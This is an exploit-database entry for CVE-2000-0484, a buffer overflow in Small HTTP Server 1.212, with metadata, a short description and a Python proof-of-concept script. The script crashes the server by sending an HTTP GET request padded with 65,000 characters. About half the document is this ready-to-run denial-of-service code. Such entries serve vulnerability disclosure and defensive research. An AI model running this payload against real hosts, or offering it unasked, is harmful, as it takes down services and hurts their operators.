Max Feoktistov Small HTTP server 1.212 - Buffer Overflow

Author: Ussr Labs
type: dos
platform: windows
port: 
date_added: 2000-06-16  
date_updated: 2012-07-22  
verified: 1  
codes: CVE-2000-0484;OSVDB-1401  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 20017.py  

source: https://www.securityfocus.com/bid/1355/info

A buffer overflow is present in certain versions of the Small HTTP Server . The overflow in question is triggered by an overlong (65000 or more characters) malformed HTTP GET request to the webserver.

#!/usr/bin/python
#
# Small HTTP Server DoS Proof of Concept Code.
# Vulnerability Discovered by USSR Labs(http://www.ussrback.com)
# Simple Script by Prizm(Prizm@Resentment.org)
#
# By connecting to port 80(http) on a system running Small HTTP Server
and issuing a GET
# command followed by 65000 bytes, the service will crash.
#
# This *simple* little script will cause http.exe to crash.

import httplib

h = httplib.HTTP('xxx.xxx.xxx.xxx') #replace x's with ip
h.putrequest('GET', 'A' * 65000)

#end